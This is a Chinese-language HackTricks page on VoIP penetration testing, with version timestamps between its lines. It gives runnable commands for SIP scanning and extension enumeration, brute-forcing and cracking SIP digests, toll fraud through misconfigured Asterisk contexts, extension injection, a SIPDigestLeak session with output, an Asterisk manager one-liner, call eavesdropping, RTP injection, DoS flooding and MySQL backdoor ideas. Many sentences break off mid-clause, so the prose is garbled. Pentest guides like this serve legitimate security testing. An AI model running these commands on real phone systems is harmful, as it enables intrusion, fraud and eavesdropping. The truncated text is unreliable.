2023-08-03 19:12:22 +00:00
# VoIP渗透测试
2023-04-17 15:16:32 +00:00
< details >
2024-02-08 04:42:06 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-02-09 08:58:25 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
2024-02-08 04:42:06 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2023-04-17 15:16:32 +00:00
< / details >
2023-08-03 19:12:22 +00:00
## VoIP基本信息
2023-04-17 15:16:32 +00:00
2023-08-03 19:12:22 +00:00
要开始学习VoIP的工作原理, :
2023-04-17 15:16:32 +00:00
{% content-ref url="basic-voip-protocols/" %}
[basic-voip-protocols ](basic-voip-protocols/ )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## VoIP枚举
2023-04-17 15:16:32 +00:00
2023-08-03 19:12:22 +00:00
### 电话号码
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
红队可以执行的首要步骤之一是使用OSINT工具、Google搜索或网页抓取搜索可用电话号码以联系公司。
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
一旦获得电话号码,您可以使用在线服务来识别运营商:
2023-04-17 15:16:32 +00:00
* [https://www.numberingplans.com/?page=analysis\&sub=phonenr ](https://www.numberingplans.com/?page=analysis\&sub=phonenr )
* [https://mobilenumbertracker.com/ ](https://mobilenumbertracker.com/ )
* [https://www.whitepages.com/ ](https://www.whitepages.com/ )
* [https://www.twilio.com/lookup ](https://www.twilio.com/lookup )
2024-02-08 04:42:06 +00:00
了解运营商是否提供VoIP服务, , ,
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
诸如自动响应或音乐通常表明正在使用VoIP。
2023-08-29 18:24:41 +00:00
### Google Dorks
2023-04-17 15:16:32 +00:00
```bash
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
```
2023-08-03 19:12:22 +00:00
### OSINT信息
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
任何其他有助于识别正在使用的VoIP软件的OSINT枚举对红队都是有帮助的。
2023-04-17 15:16:32 +00:00
2023-08-03 19:12:22 +00:00
### 网络枚举
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
- **`nmap`** 能够扫描UDP服务, , ,
2024-02-08 04:42:06 +00:00
- **`svmap`** 来自SIPVicious (`sudo apt install sipvicious`):
- `svmap` **易于阻止** , `friendly-scanner` ,但您可以修改`/usr/share/sipvicious/sipvicious`中的代码并进行更改。
2023-04-17 15:16:32 +00:00
```bash
# Use --fp to fingerprint the services
2023-04-23 19:20:09 +00:00
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
2023-04-17 15:16:32 +00:00
```
2024-02-09 08:58:25 +00:00
* **`sipscan.py`** 来自[**sippts**](https://github.com/Pepelux/sippts)**: , ( ) ( )
2023-04-17 15:16:32 +00:00
```bash
2023-08-03 19:12:22 +00:00
./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
2023-04-17 15:16:32 +00:00
2023-04-23 19:20:09 +00:00
[!] IP/Network: 10.10.0.0/24
2023-04-17 15:16:32 +00:00
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
```
2024-02-08 04:42:06 +00:00
* **metasploit**:
2023-04-17 15:16:32 +00:00
```
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
```
2024-02-08 04:42:06 +00:00
#### 额外网络枚举
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
PBX也可能会暴露其他网络服务, :
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
- **69/UDP (TFTP)**:固件更新
- **80 (HTTP) / 443 (HTTPS)**:
- **389 (LDAP)**:用于存储用户信息的替代方法
- **3306 (MySQL)**:
- **5038 (Manager)**:
- **5222 (XMPP)**:
- **5432 (PostgreSQL)**:
- 以及其他...
2023-04-17 15:16:32 +00:00
2023-08-03 19:12:22 +00:00
### 方法枚举
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
可以使用[sippts](https://github.com/Pepelux/sippts)中的`sipenumerate.py`来查找PBX中可用的方法。
2023-04-23 19:20:09 +00:00
```bash
python3 sipenumerate.py -i 10.10.0.10 -r 5080
```
2023-08-03 19:12:22 +00:00
### 分机枚举
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
在 PBX( ) ,
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
- **`svwar`** 来自 SIPVicious( ) :
2023-04-17 15:16:32 +00:00
```bash
2023-04-23 19:20:09 +00:00
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
2023-04-17 15:16:32 +00:00
```
2024-02-09 08:58:25 +00:00
* **`sipextend.py`** 来自[**sippts**](https://github.com/Pepelux/sippts)**:
2023-04-17 15:16:32 +00:00
```bash
2023-04-23 19:20:09 +00:00
python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200
2023-04-17 15:16:32 +00:00
```
2023-08-29 18:24:41 +00:00
* **metasploit**: 您还可以使用metasploit枚举扩展名/用户名:
2023-04-17 15:16:32 +00:00
```
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
```
2023-08-03 19:12:22 +00:00
* **`enumiax` (`apt install enumiax`): enumIAX** 是一种用于 Inter Asterisk Exchange 协议的**用户名暴力破解枚举器**。enumIAX 可以以两种不同的模式运行;顺序用户名猜测或字典攻击。
2023-04-17 15:16:32 +00:00
```bash
2023-08-03 19:12:22 +00:00
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
2023-04-23 19:20:09 +00:00
enumiax -v -m3 -M3 10.10.0.10
2023-04-17 15:16:32 +00:00
```
2024-02-08 04:42:06 +00:00
## VoIP 攻击
2023-04-17 15:16:32 +00:00
2023-08-03 19:12:22 +00:00
### 密码暴力破解
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
在发现了 **PBX** 和一些 **分机号/用户名** 后,红队可以尝试使用常见密码字典对一个分机号进行 ** `REGISTER` 方法认证**,以进行身份验证的暴力破解。
2023-04-17 15:16:32 +00:00
{% hint style="danger" %}
2024-02-08 04:42:06 +00:00
请注意,**用户名** 可能与分机号相同,但这种做法可能会因 PBX 系统、其配置和组织偏好而有所不同...
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
如果用户名与分机号不同,您将需要 **找出用户名以进行暴力破解** 。
2023-04-17 15:16:32 +00:00
{% endhint %}
2024-02-09 08:58:25 +00:00
* **`svcrack`** 来自 SIPVicious (`sudo apt install sipvicious`):
2023-04-17 15:16:32 +00:00
```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
```
2024-02-08 04:42:06 +00:00
* **`sipcrack.py`** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:
2023-04-17 15:16:32 +00:00
{% code overflow="wrap" %}
```bash
2023-04-23 19:20:09 +00:00
python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
2023-04-17 15:16:32 +00:00
```
{% endcode %}
* **Metasploit**:
2023-08-03 19:12:22 +00:00
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb ](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb )
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb ](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb )
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
### VoIP 抓包
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
如果你在**开放的无线网络**中发现 VoIP 设备,你可以**抓取所有信息**。此外,如果你在一个更封闭的网络中(通过以太网连接或受保护的 Wifi 连接),你可以执行**中间人攻击,比如**[**ARP欺骗**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)在**PBX和网关之间**以便抓取信息。
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
在网络信息中,你可以找到用于管理设备的**web凭据**,用户**分机**, ,
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
要获取这些信息,
2023-04-18 14:22:56 +00:00
2023-04-17 15:16:32 +00:00
{% hint style="danger" %}
2024-02-09 08:58:25 +00:00
请注意,如果**SIP通信中使用了TLS**,你将无法清楚地看到 SIP 通信。\
2024-02-08 04:42:06 +00:00
如果使用了**SRTP**和**ZRTP**,
2023-04-17 15:16:32 +00:00
{% endhint %}
2024-02-09 08:58:25 +00:00
#### SIP 凭据
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
[查看此示例以更好地理解**SIP REGISTER通信** ](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example )以了解**凭据是如何发送的**。
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
* **`sipdump`** 和 ** `sipcrack` ,** 是 **sipcrack** 的一部分(`apt-get install sipcrack`):这些工具可以从 **pcap** 中**提取** SIP 协议中的**摘要认证**,并对其进行**暴力破解**。
2023-04-17 15:16:32 +00:00
```bash
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
```
2023-08-03 19:12:22 +00:00
* **`siptshar.py`, `sipdump.py` , `sipcrack.py` ** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:**
2024-02-08 04:42:06 +00:00
* **SipTshark** 从 PCAP 文件中提取 SIP 协议的数据。
* **SipDump** 从 PCAP 文件中提取 SIP Digest 认证。
* **SIP Digest Crack** 是一个用于破解 SIP 协议中摘要认证的工具。
2023-04-17 15:16:32 +00:00
```bash
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
```
2024-02-08 04:42:06 +00:00
#### DTMF codes
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
**不仅可以在网络流量中找到SIP凭据**,还可以找到用于访问**语音信箱**的DTMF代码。\
可以将这些代码发送在**INFO SIP消息**中,以**音频**或者**RTP数据包**的形式。如果这些代码在RTP数据包中, , :
2023-04-17 15:16:32 +00:00
```bash
multimon -a DTMF -t wac pin.wav
```
2023-08-29 18:24:41 +00:00
### 免费通话 / Asterisks 连接配置错误
2023-04-17 15:16:32 +00:00
2024-02-08 04:42:06 +00:00
在 Asterisk 中,可以允许来自**特定 IP 地址**或**任何 IP 地址**的连接:
2023-04-17 15:36:54 +00:00
```
host=10.10.10.10
host=dynamic
```
2024-02-09 08:58:25 +00:00
如果指定了IP地址, ( , , ) , ,
2023-04-17 15:36:54 +00:00
2024-02-08 04:42:06 +00:00
要定义用户,可以定义为:
2023-04-17 15:36:54 +00:00
2024-02-08 04:42:06 +00:00
- **`type=user`**:用户只能作为用户接收呼叫。
- **`type=friend`**:可以作为对等体发起呼叫并作为用户接收呼叫(与分机一起使用)。
- **`type=peer`**: ( )
2023-04-17 15:36:54 +00:00
2024-02-08 04:42:06 +00:00
还可以通过不安全的变量建立信任:
2023-04-17 15:36:54 +00:00
2024-02-09 08:58:25 +00:00
- **`insecure=port`**:
2024-02-08 04:42:06 +00:00
- **`insecure=invite`**:
- **`insecure=port,invite`**:两者都需要。
2023-04-17 15:36:54 +00:00
{% hint style="warning" %}
2024-02-09 08:58:25 +00:00
当使用**`type=friend`**时,**主机**变量的**值将不会被使用**,因此,如果管理员使用该值**错误配置SIP-trunk**,
2023-04-17 15:36:54 +00:00
2024-02-08 04:42:06 +00:00
例如,此配置将存在漏洞:\
2023-04-17 15:36:54 +00:00
`host=10.10.10.10` \
`insecure=port,invite` \
`type=friend`
{% endhint %}
2024-02-08 04:42:06 +00:00
### 免费通话 / Asterisks 上下文错误配置
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
在Asterisk中, ,
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
每个上下文在配置文件中定义,通常在**`extensions.conf`**文件中。上下文由方括号表示,上下文名称在其中。例如:
2023-04-18 04:09:32 +00:00
```bash
csharpCopy code[my_context]
```
2024-02-08 04:42:06 +00:00
在上下文中,您定义分机(拨号号码的模式),并将它们与一系列操作或应用程序关联起来。这些操作决定了呼叫的处理方式。例如:
2023-04-18 04:09:32 +00:00
```scss
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
```
2024-02-09 08:58:25 +00:00
这个示例演示了一个名为"my\_context"的简单上下文,其中包含一个分机"100"。当有人拨打100时, , ,
2023-04-18 04:09:32 +00:00
2023-08-03 19:12:22 +00:00
这是**另一个上下文**,允许**拨打任何其他号码**:
2023-04-18 04:09:32 +00:00
```scss
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
```
2023-08-03 19:12:22 +00:00
如果管理员将**默认上下文**定义为:
2023-04-18 04:09:32 +00:00
```
[default]
include => my_context
include => external
```
{% hint style="warning" %}
2023-08-03 19:12:22 +00:00
任何人都可以使用服务器拨打任何其他号码(服务器管理员将为通话付费)。
2023-04-18 04:09:32 +00:00
{% endhint %}
{% hint style="danger" %}
2024-02-08 04:42:06 +00:00
此外,默认情况下,`sip.conf` 文件包含 `allowguest=true` ,因此任何未经身份验证的攻击者都可以拨打任何其他号码。
2023-04-18 04:09:32 +00:00
{% endhint %}
2023-08-29 18:24:41 +00:00
* ** `sipinvite.py` ** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:
2023-04-18 04:09:32 +00:00
2024-02-09 08:58:25 +00:00
例如,如果您的 Asterisk 服务器具有错误的上下文配置,您可以接受未经授权的 INVITE 请求。在这种情况下,攻击者可以在不知道任何用户/密码的情况下进行呼叫。
2023-04-18 04:09:32 +00:00
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
2023-04-23 19:20:09 +00:00
python3 sipinvite.py -i 10.10.0.10 -fu 200 -tu 555555555 -v
2023-04-18 04:09:32 +00:00
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
2023-04-23 19:20:09 +00:00
python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444
2023-04-18 04:09:32 +00:00
```
2024-02-09 08:58:25 +00:00
{% endcode %}
2024-02-08 04:42:06 +00:00
### 免费通话 / 配置错误的 IVRS
2023-04-18 04:09:32 +00:00
2024-02-09 08:58:25 +00:00
IVRS 代表**交互式语音应答系统**, ,
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
VoIP 系统中的 IVRS 通常包括:
2023-04-18 04:09:32 +00:00
2024-02-09 08:58:25 +00:00
1. **语音提示** :预先录制的音频消息,引导用户浏览 IVR 菜单选项和说明。
2024-02-08 04:42:06 +00:00
2. **DTMF** (双音多频)信号:通过在电话上按键生成的按键输入,用于浏览 IVR 菜单并提供输入。
2024-02-09 08:58:25 +00:00
3. **呼叫路由** :根据用户输入将呼叫定向到适当的目的地,如特定部门、代理或分机。
4. **用户输入捕获** :从呼叫者收集信息,如帐号号码、案例 ID 或任何其他相关数据。
2024-02-08 04:42:06 +00:00
5. **与外部系统集成** :将 IVR 系统连接到数据库或其他软件系统,以访问或更新信息、执行操作或触发事件。
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
在 Asterisk VoIP 系统中,您可以使用拨号计划(**`extensions.conf`** 文件)和各种应用程序(如 `Background()` 、`Playback()`、`Read()` 等)创建 IVR。这些应用程序帮助您播放语音提示、捕获用户输入并控制呼叫流程。
2023-04-18 04:09:32 +00:00
2024-02-09 08:58:25 +00:00
#### 易受攻击配置示例
2023-04-18 04:09:32 +00:00
```scss
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
```
2024-02-09 08:58:25 +00:00
前面是一个示例,用户被要求**按1拨打**一个部门,**按2拨打**另一个部门,或者**输入完整分机号码**(如果知道的话)。\
漏洞在于未检查指定的**分机号长度, ,
2023-04-18 04:09:32 +00:00
2023-08-03 19:12:22 +00:00
### 分机注入
2023-04-18 04:09:32 +00:00
2024-02-09 08:58:25 +00:00
使用类似以下的分机号码:
2023-04-18 04:09:32 +00:00
```scss
exten => _X.,1,Dial(SIP/${EXTEN})
```
2024-02-09 08:58:25 +00:00
在**`${EXTEN}`**是将要被呼叫的**分机号**时,当**输入ext 101**时会发生以下情况:
2023-04-18 04:09:32 +00:00
```scss
exten => 101,1,Dial(SIP/101)
```
2024-02-09 08:58:25 +00:00
然而,如果 ** `${EXTEN}` ** 允许输入**不仅限于数字**( ) , ** `101&SIP123123123` ** 来拨打电话号码123123123。这将是结果:
2023-04-18 04:09:32 +00:00
```scss
exten => 101& SIP123123123,1,Dial(SIP/101& SIP123123123)
```
2023-04-23 19:20:09 +00:00
## SIPDigestLeak
2024-02-09 08:58:25 +00:00
SIP Digest Leak是一种影响大量SIP电话( ( ) ) ,
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
**[从这里开始的漏洞场景](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)**:
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
1. 一个IP电话( ) ,
2023-08-03 19:12:22 +00:00
2. 攻击者向IP电话发送INVITE
2024-02-08 04:42:06 +00:00
3. 受害者电话开始响铃,有人接听并挂断(因为在另一端没有人接听电话)
2024-02-09 08:58:25 +00:00
4. 当电话挂断时,**受害者电话向攻击者发送一个BYE**
5. **攻击者发出一个407响应** ,
6. **受害者电话在第二个BYE中提供了对身份验证挑战的响应**
7. **攻击者然后可以在本地机器上(或分布式网络等)对挑战响应进行暴力破解攻击** ,猜测密码
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
* **sipdigestleak.py** 来自[**sippts**](https://github.com/Pepelux/sippts)**:
2023-04-23 19:20:09 +00:00
```bash
python3 sipdigestleak.py -i 10.10.0.10
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[< =] Response 100 Trying
[< =] Response 180 Ringing
[< =] Response 200 OK
[=>] Request ACK
2023-08-03 19:12:22 +00:00
... waiting for BYE ...
2023-04-23 19:20:09 +00:00
[< =] Received BYE
[=>] Request 407 Proxy Authentication Required
[< =] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
```
2024-02-08 04:42:06 +00:00
### 点击通话
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
点击通话允许一个**网页用户**(例如可能对某个产品感兴趣)**输入**他的**电话号码**以便接到电话。然后会拨打一个商业电话,当他**接听电话**时,用户将被**呼叫并与代理人连接**。
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
一个常见的Asterisk配置文件是:
2023-04-18 04:09:32 +00:00
```scss
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
```
2024-02-08 04:42:06 +00:00
* 先前的配置允许**任何IP地址连接**(如果知道密码)。
* 要**发起呼叫**,如先前指定的,**不需要读取权限**,只需要**写入**中的**发起**权限。
2023-04-18 04:09:32 +00:00
2024-02-08 04:42:06 +00:00
有了这些权限, , :
2023-04-18 04:09:32 +00:00
```bash
# Get all the peers
exec 3< >/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">& 3 && cat <& 3
```
{% endcode %}
2023-08-03 19:12:22 +00:00
**更多信息或操作可能会被请求。**
2023-04-18 04:09:32 +00:00
2023-08-03 19:12:22 +00:00
### **窃听**
2023-04-18 14:22:56 +00:00
2024-02-08 04:42:06 +00:00
在Asterisk中,
2023-04-18 14:22:56 +00:00
2024-02-09 08:58:25 +00:00
例如,**`exten => 333,1,ChanSpy('all',qb)`** 表示如果您**拨打**分机号码**333**,它将**监听**所有分机号码,**在新对话开始时**(
2023-04-18 14:22:56 +00:00
2023-08-03 19:12:22 +00:00
还可以使用**`ExtenSpy`**来仅监视一个分机号码。
2023-04-18 14:22:56 +00:00
2024-02-08 04:42:06 +00:00
除了收听对话外,还可以使用诸如以下分机号码之类的分机号码将它们**记录在文件中**:
2023-04-18 14:22:56 +00:00
```scss
[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_ ${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})
```
{% endcode %}
2023-08-03 19:12:22 +00:00
通话将保存在 ** `/tmp` ** 中。
2023-04-18 14:22:56 +00:00
2024-02-08 04:42:06 +00:00
您甚至可以让Asterisk执行一个脚本,
2023-04-18 14:22:56 +00:00
```scss
exten => h,1,System(/tmp/leak_conv.sh & )
```
2023-04-23 19:20:09 +00:00
### RTCPBleed
2024-02-08 04:42:06 +00:00
**RTCPBleed**是一个影响基于Asterisk的VoIP服务器的重大安全问题( ) ( ) , , ( ) ,
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
RTP代理试图解决影响RTC系统的**NAT限制**, , ( ) , , , , , ,
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
RTP代理和RTP堆栈的另一个有趣行为是, , , , ,
2023-04-23 19:20:09 +00:00
2024-02-09 08:58:25 +00:00
Asterisk和FreePBX传统上使用**`NAT=yes`设置**, ,
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
有关更多信息,请查看[https://www.rtpbleed.com/](https://www.rtpbleed.com/)
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
* **`rtpbleed.py`** 来自[**sippts**](https://github.com/Pepelux/sippts)**:
2023-04-23 19:20:09 +00:00
```bash
python3 rtpbleed.py -i 10.10.0.10
```
2024-02-09 08:58:25 +00:00
* **`rtcpbleed.py`** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:
2023-04-23 19:20:09 +00:00
```bash
python3 rtcpbleed.py -i 10.10.0.10
```
2024-02-09 08:58:25 +00:00
* **`rtpbleedflood.py`** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:
2023-04-23 19:20:09 +00:00
```bash
python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v
```
2024-02-08 04:42:06 +00:00
* **`rtpbleedinject.py`** 来自 [**sippts** ](https://github.com/Pepelux/sippts )**:
2023-04-23 19:20:09 +00:00
```bash
python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav
```
2024-02-08 04:42:06 +00:00
### RCE
2023-04-23 19:20:09 +00:00
2024-02-08 04:42:06 +00:00
在Asterisk中, ( ) ,
2023-04-19 03:00:28 +00:00
```scss
same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
```
2024-02-08 04:42:06 +00:00
有一个名为**`Shell`**的命令,可以在必要时用来执行系统命令,**而不是使用`System`**。
2023-04-19 03:00:28 +00:00
{% hint style="warning" %}
2024-02-08 04:42:06 +00:00
如果服务器在**`System`**命令中( ) , ( ) ,
2023-04-19 03:00:28 +00:00
{% endhint %}
2023-08-03 19:12:22 +00:00
#### 有趣的本地文件和权限
2023-04-19 03:00:28 +00:00
2023-08-03 19:12:22 +00:00
* **`sip.conf`** -> 包含SIP用户的密码。
2024-02-09 08:58:25 +00:00
* 如果**Asterisk服务器以root身份运行**,
2024-02-08 04:42:06 +00:00
* **mysql root用户**可能**没有密码**。
2024-02-09 08:58:25 +00:00
* 这可以用来创建一个新的mysql用户作为后门。
2023-04-19 03:00:28 +00:00
* **`FreePBX`**
2024-02-09 08:58:25 +00:00
* **`amportal.conf`** -> 包含Web面板管理员( )
* **`FreePBX.conf`** -> 包含用于访问数据库的用户FreePBXuser的密码。
* 这可以用来创建一个新的mysql用户作为后门。
2023-04-19 03:00:28 +00:00
* **`Elastix`**
2024-02-09 08:58:25 +00:00
* **`Elastix.conf`** -> 包含明文密码, , ,
2024-02-08 04:42:06 +00:00
* **多个文件夹**将属于被入侵的Asterisk用户( ) ,
2023-04-19 03:00:28 +00:00
2023-08-03 19:12:22 +00:00
### RTP注入
2023-04-18 14:22:56 +00:00
2024-02-08 04:42:06 +00:00
可以使用诸如**`rtpinsertsound`**( (
2023-04-18 14:22:56 +00:00
2024-02-08 04:42:06 +00:00
或者您可以使用来自[http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/)的脚本来**扫描对话**( ( (
2023-04-18 14:22:56 +00:00
### DoS
2024-02-09 08:58:25 +00:00
有几种方法可以尝试在VoIP服务器上实现DoS。
2023-04-18 14:22:56 +00:00
2024-02-09 08:58:25 +00:00
* 来自[**sippts**](https://github.com/Pepelux/sippts)的**`sipflood.py`**:
2023-08-03 19:12:22 +00:00
* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
2024-02-08 04:42:06 +00:00
* [**IAXFlooder** ](https://www.kali.org/tools/iaxflood/ ):
* [**inviteflood** ](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt ):
2023-08-03 19:12:22 +00:00
* [**rtpflood** ](https://www.kali.org/tools/rtpflood/ ): ( )
2024-02-08 04:42:06 +00:00
* [**SIPp** ](https://github.com/SIPp/sipp ):
2023-08-29 18:24:41 +00:00
* [**SIPsak** ](https://github.com/nils-ohlmeier/sipsak ):
2023-08-03 19:12:22 +00:00
* Fuzzers: ,
2024-02-08 04:42:06 +00:00
* 来自[**sippts**](https://github.com/Pepelux/sippts)的**`sipsend.py`**:
2023-08-03 19:12:22 +00:00
* 来自[**sippts**](https://github.com/Pepelux/sippts)的**`wssend.py`**:
2023-04-18 14:22:56 +00:00
2023-08-03 19:12:22 +00:00
### 操作系统漏洞
2023-04-19 03:00:28 +00:00
2024-02-09 08:58:25 +00:00
安装诸如Asterisk之类的软件的最简单方法是下载已经安装了它的**操作系统分发版**,例如:**FreePBX, ,
2023-04-19 03:00:28 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2023-04-23 19:20:09 +00:00
* [https://github.com/Pepelux/sippts/wiki ](https://github.com/Pepelux/sippts/wiki )
2023-04-23 19:27:30 +00:00
* [http://blog.pepelux.org/ ](http://blog.pepelux.org/ )
2023-04-23 19:20:09 +00:00
* [https://www.rtpbleed.com/ ](https://www.rtpbleed.com/ )
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4 ](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4 )
2024-02-08 04:42:06 +00:00
* [https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf ](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf )
2023-04-23 19:20:09 +00:00
2023-04-17 15:16:32 +00:00
< details >
2024-02-08 04:42:06 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
支持HackTricks的其他方式:
2023-04-17 15:16:32 +00:00
2024-02-09 08:58:25 +00:00
